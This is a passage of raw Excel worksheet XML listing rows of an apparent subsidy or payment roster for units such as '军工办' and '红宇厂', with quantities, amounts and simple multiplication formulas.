        <v>1</v>
      </c>
      <c r="H2534" s="25">
        <v>365</v>
      </c>
      <c r="I2534" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2534" s="41">
        <v>45108</v>
      </c>
      <c r="K2534" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2535" customHeight="1" spans="1:11">
      <c r="A2535" s="23" t="s">
        <v>6731</v>
      </c>
      <c r="B2535" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2535" s="24" t="s">
        <v>6710</v>
      </c>
      <c r="D2535" s="24" t="s">
        <v>6732</v>
      </c>
      <c r="E2535" s="24" t="s">
        <v>6733</v>
      </c>
      <c r="F2535" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2535" s="24">
        <v>1</v>
      </c>
      <c r="H2535" s="25">
        <v>365</v>
      </c>
      <c r="I2535" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2535" s="41">
        <v>45108</v>
      </c>
      <c r="K2535" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2536" customHeight="1" spans="1:11">
      <c r="A2536" s="23" t="s">
        <v>6734</v>
      </c>
      <c r="B2536" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2536" s="24" t="s">
        <v>6710</v>
      </c>
      <c r="D2536" s="24" t="s">
        <v>6735</v>
      </c>
      <c r="E2536" s="24" t="s">
        <v>4778</v>
      </c>
      <c r="F2536" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2536" s="24">
        <v>1</v>
      </c>
      <c r="H2536" s="25">
        <v>365</v>
      </c>
      <c r="I2536" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2536" s="41">
        <v>45108</v>
      </c>
      <c r="K2536" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2537" customHeight="1" spans="1:11">
      <c r="A2537" s="23" t="s">
        <v>6736</v>
      </c>
      <c r="B2537" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2537" s="24" t="s">
        <v>6710</v>
      </c>
      <c r="D2537" s="24" t="s">
        <v>6737</v>
      </c>
      <c r="E2537" s="24" t="s">
        <v>4914</v>
      </c>
      <c r="F2537" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2537" s="24">
        <v>1</v>
      </c>
      <c r="H2537" s="25">
        <v>365</v>
      </c>
      <c r="I2537" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2537" s="41">
        <v>45108</v>
      </c>
      <c r="K2537" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2538" customHeight="1" spans="1:11">
      <c r="A2538" s="23" t="s">
        <v>6738</v>
      </c>
      <c r="B2538" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2538" s="24" t="s">
        <v>6710</v>
      </c>
      <c r="D2538" s="24" t="s">
        <v>6739</v>
      </c>
      <c r="E2538" s="24" t="s">
        <v>6740</v>
      </c>
      <c r="F2538" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2538" s="24">
        <v>1</v>
      </c>
      <c r="H2538" s="25">
        <v>365</v>
      </c>
      <c r="I2538" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2538" s="41">
        <v>45108</v>
      </c>
      <c r="K2538" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2539" customHeight="1" spans="1:11">
      <c r="A2539" s="23" t="s">
        <v>6741</v>
      </c>
      <c r="B2539" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2539" s="24" t="s">
        <v>6710</v>
      </c>
      <c r="D2539" s="24" t="s">
        <v>6742</v>
      </c>
      <c r="E2539" s="24" t="s">
        <v>4743</v>
      </c>
      <c r="F2539" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2539" s="24">
        <v>3</v>
      </c>
      <c r="H2539" s="25">
        <v>290</v>
      </c>
      <c r="I2539" s="24">
        <f t="shared" si="39"/>
        <v>870</v>
      </c>
      <c r="J2539" s="41">
        <v>45108</v>
      </c>
      <c r="K2539" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2540" customHeight="1" spans="1:11">
      <c r="A2540" s="23" t="s">
        <v>6743</v>
      </c>
      <c r="B2540" s="24" t="str">
        <f>B2539</f>
        <v>军工办</v>
      </c>
      <c r="C2540" s="24" t="str">
        <f>C2539</f>
        <v>红阳厂社区</v>
      </c>
      <c r="D2540" s="23" t="s">
        <v>6744</v>
      </c>
      <c r="E2540" s="23" t="s">
        <v>6745</v>
      </c>
      <c r="F2540" s="24" t="str">
        <f>F2539</f>
        <v>4113210699</v>
      </c>
      <c r="G2540" s="24"/>
      <c r="H2540" s="24"/>
      <c r="I2540" s="24">
        <f t="shared" si="39"/>
        <v>0</v>
      </c>
      <c r="J2540" s="41"/>
      <c r="K2540" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2541" customHeight="1" spans="1:11">
      <c r="A2541" s="23" t="s">
        <v>6746</v>
      </c>
      <c r="B2541" s="24" t="str">
        <f>B2540</f>
        <v>军工办</v>
      </c>
      <c r="C2541" s="24" t="str">
        <f>C2540</f>
        <v>红阳厂社区</v>
      </c>
      <c r="D2541" s="23" t="s">
        <v>6747</v>
      </c>
      <c r="E2541" s="31" t="s">
        <v>5292</v>
      </c>
      <c r="F2541" s="24" t="str">
        <f>F2540</f>
        <v>4113210699</v>
      </c>
      <c r="G2541" s="24"/>
      <c r="H2541" s="24"/>
      <c r="I2541" s="24">
        <f t="shared" si="39"/>
        <v>0</v>
      </c>
      <c r="J2541" s="41"/>
      <c r="K2541" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2542" customHeight="1" spans="1:11">
      <c r="A2542" s="23" t="s">
        <v>6748</v>
      </c>
      <c r="B2542" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2542" s="24" t="s">
        <v>6710</v>
      </c>
      <c r="D2542" s="24" t="s">
        <v>6749</v>
      </c>
      <c r="E2542" s="24" t="s">
        <v>6750</v>
      </c>
      <c r="F2542" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2542" s="24">
        <v>1</v>
      </c>
      <c r="H2542" s="25">
        <v>365</v>
      </c>
      <c r="I2542" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2542" s="41">
        <v>45108</v>
      </c>
      <c r="K2542" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2543" customHeight="1" spans="1:11">
      <c r="A2543" s="23" t="s">
        <v>6751</v>
      </c>
      <c r="B2543" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2543" s="24" t="s">
        <v>6710</v>
      </c>
      <c r="D2543" s="24" t="s">
        <v>6752</v>
      </c>
      <c r="E2543" s="24" t="s">
        <v>4914</v>
      </c>
      <c r="F2543" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2543" s="24">
        <v>1</v>
      </c>
      <c r="H2543" s="25">
        <v>365</v>
      </c>
      <c r="I2543" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2543" s="41">
        <v>45108</v>
      </c>
      <c r="K2543" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2544" customHeight="1" spans="1:11">
      <c r="A2544" s="23" t="s">
        <v>6753</v>
      </c>
      <c r="B2544" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2544" s="24" t="s">
        <v>6710</v>
      </c>
      <c r="D2544" s="24" t="s">
        <v>6754</v>
      </c>
      <c r="E2544" s="24" t="s">
        <v>6755</v>
      </c>
      <c r="F2544" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2544" s="24">
        <v>2</v>
      </c>
      <c r="H2544" s="25">
        <v>325</v>
      </c>
      <c r="I2544" s="24">
        <f t="shared" si="39"/>
        <v>650</v>
      </c>
      <c r="J2544" s="24">
        <v>45231</v>
      </c>
      <c r="K2544" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2545" customHeight="1" spans="1:11">
      <c r="A2545" s="23" t="s">
        <v>6756</v>
      </c>
      <c r="B2545" s="24" t="str">
        <f>B2544</f>
        <v>军工办</v>
      </c>
      <c r="C2545" s="24" t="str">
        <f>C2544</f>
        <v>红阳厂社区</v>
      </c>
      <c r="D2545" s="32" t="s">
        <v>6757</v>
      </c>
      <c r="E2545" s="32" t="s">
        <v>6758</v>
      </c>
      <c r="F2545" s="24" t="str">
        <f>F2544</f>
        <v>4113210699</v>
      </c>
      <c r="G2545" s="24"/>
      <c r="H2545" s="24"/>
      <c r="I2545" s="24">
        <f t="shared" si="39"/>
        <v>0</v>
      </c>
      <c r="J2545" s="24"/>
      <c r="K2545" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2546" customHeight="1" spans="1:11">
      <c r="A2546" s="23" t="s">
        <v>6759</v>
      </c>
      <c r="B2546" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2546" s="24" t="s">
        <v>6710</v>
      </c>
      <c r="D2546" s="24" t="s">
        <v>6760</v>
      </c>
      <c r="E2546" s="24" t="s">
        <v>6761</v>
      </c>
      <c r="F2546" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2546" s="24">
        <v>2</v>
      </c>
      <c r="H2546" s="25">
        <v>325</v>
      </c>
      <c r="I2546" s="24">
        <f t="shared" si="39"/>
        <v>650</v>
      </c>
      <c r="J2546" s="24">
        <v>45231</v>
      </c>
      <c r="K2546" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2547" customHeight="1" spans="1:11">
      <c r="A2547" s="23" t="s">
        <v>6762</v>
      </c>
      <c r="B2547" s="24" t="str">
        <f>B2546</f>
        <v>军工办</v>
      </c>
      <c r="C2547" s="24" t="str">
        <f>C2546</f>
        <v>红阳厂社区</v>
      </c>
      <c r="D2547" s="32" t="s">
        <v>6763</v>
      </c>
      <c r="E2547" s="32" t="s">
        <v>6764</v>
      </c>
      <c r="F2547" s="24" t="str">
        <f>F2546</f>
        <v>4113210699</v>
      </c>
      <c r="G2547" s="24"/>
      <c r="H2547" s="24"/>
      <c r="I2547" s="24">
        <f t="shared" si="39"/>
        <v>0</v>
      </c>
      <c r="J2547" s="24"/>
      <c r="K2547" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2548" customHeight="1" spans="1:11">
      <c r="A2548" s="23" t="s">
        <v>6765</v>
      </c>
      <c r="B2548" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2548" s="24" t="s">
        <v>6766</v>
      </c>
      <c r="D2548" s="24" t="s">
        <v>6767</v>
      </c>
      <c r="E2548" s="24" t="s">
        <v>3557</v>
      </c>
      <c r="F2548" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G2548" s="24">
        <v>1</v>
      </c>
      <c r="H2548" s="25">
        <v>365</v>
      </c>
      <c r="I2548" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2548" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2548" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2549" customHeight="1" spans="1:11">
      <c r="A2549" s="23" t="s">
        <v>6768</v>
      </c>
      <c r="B2549" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2549" s="24" t="s">
        <v>6766</v>
      </c>
      <c r="D2549" s="24" t="s">
        <v>6769</v>
      </c>
      <c r="E2549" s="24" t="s">
        <v>6770</v>
      </c>
      <c r="F2549" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G2549" s="24">
        <v>1</v>
      </c>
      <c r="H2549" s="25">
        <v>365</v>
      </c>
      <c r="I2549" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2549" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2549" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2550" customHeight="1" spans="1:11">
      <c r="A2550" s="23" t="s">
        <v>6771</v>
      </c>
      <c r="B2550" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2550" s="24" t="s">
        <v>6766</v>
      </c>
      <c r="D2550" s="24" t="s">
        <v>6772</v>
      </c>
      <c r="E2550" s="24" t="s">
        <v>3776</v>
      </c>
      <c r="F2550" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G2550" s="24">
        <v>1</v>
      </c>
      <c r="H2550" s="25">
        <v>365</v>
      </c>
      <c r="I2550" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2550" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2550" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2551" customHeight="1" spans="1:11">
      <c r="A2551" s="23" t="s">
        <v>6773</v>
      </c>
      <c r="B2551" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2551" s="24" t="s">
        <v>6766</v>
      </c>
      <c r="D2551" s="24" t="s">
        <v>6774</v>
      </c>
      <c r="E2551" s="24" t="s">
        <v>3682</v>
      </c>
      <c r="F2551" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G2551" s="24">
        <v>1</v>
      </c>
      <c r="H2551" s="25">
        <v>365</v>
      </c>
      <c r="I2551" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2551" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2551" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2552" customHeight="1" spans="1:11">
      <c r="A2552" s="23" t="s">
        <v>6775</v>
      </c>
      <c r="B2552" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2552" s="24" t="s">
        <v>6766</v>
      </c>
      <c r="D2552" s="24" t="s">
        <v>6776</v>
      </c>
      <c r="E2552" s="24" t="s">
        <v>6777</v>
      </c>
      <c r="F2552" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G2552" s="24">
        <v>1</v>
      </c>
      <c r="H2552" s="25">
        <v>365</v>
      </c>
      <c r="I2552" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2552" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2552" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2553" customHeight="1" spans="1:11">
      <c r="A2553" s="23" t="s">
        <v>6778</v>
      </c>
      <c r="B2553" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2553" s="24" t="s">
        <v>6766</v>
      </c>
      <c r="D2553" s="24" t="s">
        <v>6779</v>
      </c>
      <c r="E2553" s="24" t="s">
        <v>6780</v>
      </c>
      <c r="F2553" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G2553" s="24">
        <v>1</v>
      </c>
      <c r="H2553" s="25">
        <v>365</v>
      </c>
      <c r="I2553" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2553" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2553" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2554" customHeight="1" spans="1:11">
      <c r="A2554" s="23" t="s">
        <v>6781</v>
      </c>
      <c r="B2554" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2554" s="24" t="s">
        <v>6766</v>
      </c>
      <c r="D2554" s="24" t="s">
        <v>6782</v>
      </c>
      <c r="E2554" s="24" t="s">
        <v>3604</v>
      </c>
      <c r="F2554" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G2554" s="24">
        <v>1</v>
      </c>
      <c r="H2554" s="25">
        <v>365</v>
      </c>
      <c r="I2554" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2554" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2554" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2555" customHeight="1" spans="1:11">
      <c r="A2555" s="23" t="s">
        <v>6783</v>
      </c>
      <c r="B2555" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2555" s="24" t="s">
        <v>6766</v>
      </c>
      <c r="D2555" s="24" t="s">
        <v>3796</v>
      </c>
      <c r="E2555" s="24" t="s">
        <v>4850</v>
      </c>
      <c r="F2555" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G2555" s="24">
        <v>1</v>
      </c>
      <c r="H2555" s="25">
        <v>365</v>
      </c>
      <c r="I2555" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2555" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2555" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2556" customHeight="1" spans="1:11">
      <c r="A2556" s="23" t="s">
        <v>6784</v>
      </c>
      <c r="B2556" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2556" s="24" t="s">
        <v>6766</v>
      </c>
      <c r="D2556" s="24" t="s">
        <v>6785</v>
      </c>
      <c r="E2556" s="24" t="s">
        <v>3580</v>
      </c>
      <c r="F2556" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G2556" s="24">
        <v>1</v>
      </c>
      <c r="H2556" s="25">
        <v>365</v>
      </c>
      <c r="I2556" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2556" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2556" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2557" customHeight="1" spans="1:11">
      <c r="A2557" s="23" t="s">
        <v>6786</v>
      </c>
      <c r="B2557" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2557" s="24" t="s">
        <v>6766</v>
      </c>
      <c r="D2557" s="24" t="s">
        <v>6787</v>
      </c>
      <c r="E2557" s="24" t="s">
        <v>4018</v>
      </c>
      <c r="F2557" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G2557" s="24">
        <v>1</v>
      </c>
      <c r="H2557" s="25">
        <v>365</v>
      </c>
      <c r="I2557" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2557" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2557" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2558" customHeight="1" spans="1:11">
      <c r="A2558" s="23" t="s">
        <v>6788</v>
      </c>
      <c r="B2558" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2558" s="24" t="s">
        <v>6766</v>
      </c>
      <c r="D2558" s="24" t="s">
        <v>6789</v>
      </c>
      <c r="E2558" s="24" t="s">
        <v>3679</v>
      </c>
      <c r="F2558" s="24" t="s">
        <v>3656</v>
      </c>
      <c r="G2558" s="24">
        <v>1</v>
      </c>
      <c r="H2558" s="25">
        <v>365</v>
      </c>
      <c r="I2558" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2558" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2558" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2559" customHeight="1" spans="1:11">
      <c r="A2559" s="23" t="s">
        <v>6790</v>
      </c>
      <c r="B2559" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2559" s="24" t="s">
        <v>6791</v>
      </c>
      <c r="D2559" s="24" t="s">
        <v>6792</v>
      </c>
      <c r="E2559" s="24" t="s">
        <v>6793</v>
      </c>
      <c r="F2559" s="24">
        <v>4113210399</v>
      </c>
      <c r="G2559" s="24">
        <v>1</v>
      </c>
      <c r="H2559" s="25">
        <v>365</v>
      </c>
      <c r="I2559" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2559" s="41">
        <v>45108</v>
      </c>
      <c r="K2559" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2560" customHeight="1" spans="1:11">
      <c r="A2560" s="23" t="s">
        <v>6794</v>
      </c>
      <c r="B2560" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2560" s="24" t="s">
        <v>6795</v>
      </c>
      <c r="D2560" s="24" t="s">
        <v>6796</v>
      </c>
      <c r="E2560" s="24" t="s">
        <v>3197</v>
      </c>
      <c r="F2560" s="24">
        <v>4113210399</v>
      </c>
      <c r="G2560" s="24">
        <v>1</v>
      </c>
      <c r="H2560" s="25">
        <v>365</v>
      </c>
      <c r="I2560" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2560" s="41">
        <v>45108</v>
      </c>
      <c r="K2560" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2561" customHeight="1" spans="1:11">
      <c r="A2561" s="23" t="s">
        <v>6797</v>
      </c>
      <c r="B2561" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2561" s="24" t="s">
        <v>6795</v>
      </c>
      <c r="D2561" s="24" t="s">
        <v>6798</v>
      </c>
      <c r="E2561" s="24" t="s">
        <v>6799</v>
      </c>
      <c r="F2561" s="24">
        <v>4113210399</v>
      </c>
      <c r="G2561" s="24">
        <v>1</v>
      </c>
      <c r="H2561" s="25">
        <v>365</v>
      </c>
      <c r="I2561" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2561" s="41">
        <v>45108</v>
      </c>
      <c r="K2561" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2562" customHeight="1" spans="1:11">
      <c r="A2562" s="23" t="s">
        <v>6800</v>
      </c>
      <c r="B2562" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2562" s="24" t="s">
        <v>6795</v>
      </c>
      <c r="D2562" s="24" t="s">
        <v>6801</v>
      </c>
      <c r="E2562" s="24" t="s">
        <v>370</v>
      </c>
      <c r="F2562" s="24">
        <v>4113210399</v>
      </c>
      <c r="G2562" s="24">
        <v>1</v>
      </c>
      <c r="H2562" s="25">
        <v>365</v>
      </c>
      <c r="I2562" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2562" s="41">
        <v>45108</v>
      </c>
      <c r="K2562" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2563" customHeight="1" spans="1:11">
      <c r="A2563" s="23" t="s">
        <v>6802</v>
      </c>
      <c r="B2563" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2563" s="24" t="s">
        <v>6795</v>
      </c>
      <c r="D2563" s="24" t="s">
        <v>6803</v>
      </c>
      <c r="E2563" s="24" t="s">
        <v>4447</v>
      </c>
      <c r="F2563" s="24">
        <v>4113210399</v>
      </c>
      <c r="G2563" s="24">
        <v>1</v>
      </c>
      <c r="H2563" s="25">
        <v>365</v>
      </c>
      <c r="I2563" s="24">
        <f t="shared" si="39"/>
        <v>365</v>
      </c>
      <c r="J2563" s="41">
        <v>45108</v>
      </c>
      <c r="K2563" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2564" customHeight="1" spans="1:11">
      <c r="A2564" s="23" t="s">
        <v>6804</v>
      </c>
      <c r="B2564" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2564" s="24" t="s">
        <v>6795</v>
      </c>
      <c r="D2564" s="24" t="s">
        <v>6805</v>
      </c>
      <c r="E2564" s="24" t="s">
        <v>3200</v>
      </c>
      <c r="F2564" s="24">
        <v>4113210399</v>
      </c>
      <c r="G2564" s="24">
        <v>2</v>
      </c>
      <c r="H2564" s="25">
        <v>325</v>
      </c>
      <c r="I2564" s="24">
        <f t="shared" ref="I2564:I2627" si="40">H2564*G2564</f>
        <v>650</v>
      </c>
      <c r="J2564" s="41">
        <v>45108</v>
      </c>
      <c r="K2564" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2565" customHeight="1" spans="1:11">
      <c r="A2565" s="23" t="s">
        <v>6806</v>
      </c>
      <c r="B2565" s="24" t="str">
        <f>B2564</f>
        <v>军工办</v>
      </c>
      <c r="C2565" s="24" t="str">
        <f>C2564</f>
        <v>红宇厂</v>
      </c>
      <c r="D2565" s="30" t="s">
        <v>6807</v>
      </c>
      <c r="E2565" s="31" t="s">
        <v>6808</v>
      </c>
      <c r="F2565" s="24">
        <f>F2564</f>
        <v>4113210399</v>
      </c>
      <c r="G2565" s="24"/>
      <c r="H2565" s="24"/>
      <c r="I2565" s="24">
        <f t="shared" si="40"/>
        <v>0</v>
      </c>
      <c r="J2565" s="41"/>
      <c r="K2565" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2566" customHeight="1" spans="1:11">
      <c r="A2566" s="23" t="s">
        <v>6809</v>
      </c>
      <c r="B2566" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2566" s="24" t="s">
        <v>6795</v>
      </c>
      <c r="D2566" s="24" t="s">
        <v>6810</v>
      </c>
      <c r="E2566" s="24" t="s">
        <v>3325</v>
      </c>
      <c r="F2566" s="24">
        <v>4113210399</v>
      </c>
      <c r="G2566" s="24">
        <v>1</v>
      </c>
      <c r="H2566" s="25">
        <v>365</v>
      </c>
      <c r="I2566" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2566" s="41">
        <v>45108</v>
      </c>
      <c r="K2566" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2567" customHeight="1" spans="1:11">
      <c r="A2567" s="23" t="s">
        <v>6811</v>
      </c>
      <c r="B2567" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2567" s="24" t="s">
        <v>6795</v>
      </c>
      <c r="D2567" s="24" t="s">
        <v>6812</v>
      </c>
      <c r="E2567" s="24" t="s">
        <v>6813</v>
      </c>
      <c r="F2567" s="24">
        <v>4113210399</v>
      </c>
      <c r="G2567" s="24">
        <v>1</v>
      </c>
      <c r="H2567" s="25">
        <v>365</v>
      </c>
      <c r="I2567" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2567" s="41">
        <v>45108</v>
      </c>
      <c r="K2567" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2568" customHeight="1" spans="1:11">
      <c r="A2568" s="23" t="s">
        <v>6814</v>
      </c>
      <c r="B2568" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2568" s="24" t="s">
        <v>6795</v>
      </c>
      <c r="D2568" s="24" t="s">
        <v>6815</v>
      </c>
      <c r="E2568" s="24" t="s">
        <v>6816</v>
      </c>
      <c r="F2568" s="24">
        <v>4113210399</v>
      </c>
      <c r="G2568" s="24">
        <v>1</v>
      </c>
      <c r="H2568" s="25">
        <v>365</v>
      </c>
      <c r="I2568" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2568" s="41">
        <v>45108</v>
      </c>
      <c r="K2568" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2569" customHeight="1" spans="1:11">
      <c r="A2569" s="23" t="s">
        <v>6817</v>
      </c>
      <c r="B2569" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2569" s="24" t="s">
        <v>6795</v>
      </c>
      <c r="D2569" s="24" t="s">
        <v>6818</v>
      </c>
      <c r="E2569" s="24" t="s">
        <v>6819</v>
      </c>
      <c r="F2569" s="24">
        <v>4113210399</v>
      </c>
      <c r="G2569" s="24">
        <v>1</v>
      </c>
      <c r="H2569" s="25">
        <v>365</v>
      </c>
      <c r="I2569" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2569" s="41">
        <v>45108</v>
      </c>
      <c r="K2569" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2570" customHeight="1" spans="1:11">
      <c r="A2570" s="23" t="s">
        <v>6820</v>
      </c>
      <c r="B2570" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2570" s="24" t="s">
        <v>6795</v>
      </c>
      <c r="D2570" s="24" t="s">
        <v>4257</v>
      </c>
      <c r="E2570" s="24" t="s">
        <v>3200</v>
      </c>
      <c r="F2570" s="24">
        <v>4113210399</v>
      </c>
      <c r="G2570" s="24">
        <v>1</v>
      </c>
      <c r="H2570" s="25">
        <v>365</v>
      </c>
      <c r="I2570" s="24">
        <f t="shared" si="40"/>
        <v>365</v>
      </c>
      <c r="J2570" s="41">
        <v>45108</v>
      </c>
      <c r="K2570" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2571" customHeight="1" spans="1:11">
      <c r="A2571" s="23" t="s">
        <v>6821</v>
      </c>
      <c r="B2571" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2571" s="24" t="s">
        <v>6795</v>
      </c>
      <c r="D2571" s="24" t="s">
        <v>6822</v>
      </c>
      <c r="E2571" s="24" t="s">
        <v>6823</v>
      </c>
      <c r="F2571" s="24">
        <v>4113210399</v>
      </c>
      <c r="G2571" s="24">
        <v>2</v>
      </c>
      <c r="H2571" s="25">
        <v>325</v>
      </c>
      <c r="I2571" s="24">
        <f t="shared" si="40"/>
        <v>650</v>
      </c>
      <c r="J2571" s="41">
        <v>45108</v>
      </c>
      <c r="K2571" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2572" customHeight="1" spans="1:11">
      <c r="A2572" s="23" t="s">
        <v>6824</v>
      </c>
      <c r="B2572" s="24" t="str">
        <f>B2571</f>
        <v>军工办</v>
      </c>
      <c r="C2572" s="24" t="str">
        <f>C2571</f>
        <v>红宇厂</v>
      </c>
      <c r="D2572" s="30" t="s">
        <v>6825</v>
      </c>
      <c r="E2572" s="31" t="s">
        <v>6826</v>
      </c>
      <c r="F2572" s="24">
        <f>F2571</f>
        <v>4113210399</v>
      </c>
      <c r="G2572" s="24"/>
      <c r="H2572" s="24"/>
      <c r="I2572" s="24">
        <f t="shared" si="40"/>
        <v>0</v>
      </c>
      <c r="J2572" s="41"/>
      <c r="K2572" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2573" customHeight="1" spans="1:11">
      <c r="A2573" s="23" t="s">
        <v>6827</v>
      </c>
      <c r="B2573" s="24" t="s">
        <v>6709</v>
      </c>
      <c r="C2573" s="24" t="s">
        <v>6795</v>
      </c>
